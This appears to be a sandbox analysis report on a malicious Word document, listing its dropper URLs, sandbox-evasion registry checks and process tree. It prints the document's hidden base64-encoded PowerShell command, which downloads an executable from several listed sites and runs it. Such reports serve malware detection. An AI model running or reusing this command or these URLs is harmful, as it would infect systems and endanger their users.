Analysis
-
max time kernel
19s -
resource
win10v191014 -
submitted
13-12-2019 18:40
General
-
Target
b4192c958bdc5e2bed2b4ad66659307277a2f84827342480eef3eba5adeba0cf.doc
-
Sample
191213-48qtymfn7a
-
SHA256
b4192c958bdc5e2bed2b4ad66659307277a2f84827342480eef3eba5adeba0cf
Score
8/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://sm-conference.info/program/yng1l-j6l3m8p-37065190/
exe.dropper
https://dscreationssite.com/Planninginprogress/EZrSNOm/
exe.dropper
https://innovationhackers.com.mx/wiki/8t9c-bi5psx8545-2918/
exe.dropper
http://www.windo360.com/qkoh/z3dec-5lxb-43423/
exe.dropper
http://www.cpawhy.com/wp-admin/8qy5gi4xp-k42nca-661/
Signatures
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4984 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4516 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4356 wrote to memory of 4684 4356 SppExtComObj.exe 78 PID 4516 wrote to memory of 4728 4516 Powershell.exe 80 -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4984 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4984 WINWORD.EXE 4728 13.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4516 Powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4728 13.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\b4192c958bdc5e2bed2b4ad66659307277a2f84827342480eef3eba5adeba0cf.doc" /o ""1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4984
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABGAGoAcgBkAHMAYQBmAGYAcgBtAGYAPQAnAEwAdgBmAHIAbQBjAGQAcQAnADsAJABBAHkAcgB1AHUAdQB1AGcAYQBsACAAPQAgACcAMQAzACcAOwAkAEsAawBnAGMAcgBpAGwAZgA9ACcATABrAGEAeABwAHkAcgBvACcAOwAkAFEAeQB1AHIAdQByAGEAaAB5AHgAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEEAeQByAHUAdQB1AHUAZwBhAGwAKwAnAC4AZQB4AGUAJwA7ACQAVABwAHIAaQB6AHAAbwBuAGoAbQB6AD0AJwBOAHMAaQB0AGQAbgBqAGIAYQB0ACcAOwAkAFEAeQB1AG0AcQBiAHAAawB0AGYAPQAuACgAJwBuAGUAdwAtAG8AJwArACcAYgBqAGUAJwArACcAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAEIAYwBMAGkARQBOAHQAOwAkAEMAcgBoAHkAdwB6AHgAZAA9ACcAaAB0AHQAcAA6AC8ALwBzAG0ALQBjAG8AbgBmAGUAcgBlAG4AYwBlAC4AaQBuAGYAbwAvAHAAcgBvAGcAcgBhAG0ALwB5AG4AZwAxAGwALQBqADYAbAAzAG0AOABwAC0AMwA3ADAANgA1ADEAOQAwAC8AKgBoAHQAdABwAHMAOgAvAC8AZABzAGMAcgBlAGEAdABpAG8AbgBzAHMAaQB0AGUALgBjAG8AbQAvAFAAbABhAG4AbgBpAG4AZwBpAG4AcAByAG8AZwByAGUAcwBzAC8ARQBaAHIAUwBOAE8AbQAvACoAaAB0AHQAcABzADoALwAvAGkAbgBuAG8AdgBhAHQAaQBvAG4AaABhAGMAawBlAHIAcwAuAGMAbwBtAC4AbQB4AC8AdwBpAGsAaQAvADgAdAA5AGMALQBiAGkANQBwAHMAeAA4ADUANAA1AC0AMgA5ADEAOAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAHcAaQBuAGQAbwAzADYAMAAuAGMAbwBtAC8AcQBrAG8AaAAvAHoAMwBkAGUAYwAtADUAbAB4AGIALQA0ADMANAAyADMALwAqAGgAdAB0AHAAOgAvAC8AdwB3AHcALgBjAHAAYQB3AGgAeQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AOABxAHkANQBnAGkANAB4AHAALQBrADQAMgBuAGMAYQAtADYANgAxAC8AJwAuACIAUwBQAEwAYABJAHQAIgAoACcAKgAnACkAOwAkAEwAZQB1AHgAZABsAGIAaAA9ACcAVQBzAHkAZABjAHUAeAB3AHYAZQAnADsAZgBvAHIAZQBhAGMAaAAoACQAUwB1AGIAYQBrAGsAYQBjAGIAZQBhAHcAbAAgAGkAbgAgACQAQwByAGgAeQB3AHoAeABkACkAewB0AHIAeQB7ACQAUQB5AHUAbQBxAGIAcABrAHQAZgAuACIARABgAG8AVwBuAEwAbwBBAEQARgBgAEkAbABFACIAKAAkAFMAdQBiAGEAawBrAGEAYwBiAGUAYQB3AGwALAAgACQAUQB5AHUAcgB1AHIAYQBoAHkAeAApADsAJABOAGUAZwBlAG4AYgBqAG0APQAnAFMAaQBvAGsAdQBwAGYAYgB5AHgAdwBjAHkAJwA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtAEkAJwArACcAdABlAG0AJwApACAAJABRAHkAdQByAHUAcgBhAGgAeQB4ACkALgAiAGwAZQBuAGAAZwB0AEgAIgAgAC0AZwBlACAAMwAyADUANQAxACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABBAGAAUgB0ACIAKAAkAFEAeQB1AHIAdQByAGEAaAB5AHgAKQA7ACQASwBvAGQAZAB4AHUAdQBrAD0AJwBSAHoAeAB6AHkAYQByAHgAegBxAHAAJwA7AGIAcgBlAGEAawA7ACQASQBxAHUAZgBpAGUAawBmAD0AJwBOAHEAdQBqAHAAegB4AG8AZABzACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEcAZAB5AHoAdwBsAGEAcQBmAGwAcwBvAHUAPQAnAFAAbABmAGcAawBiAHEAawAnAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
PID:4516 -
C:\Users\Admin\13.exe"C:\Users\Admin\13.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:4728
-
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:4356 -
C:\Windows\System32\SLUI.exe"C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent2⤵PID:4684
-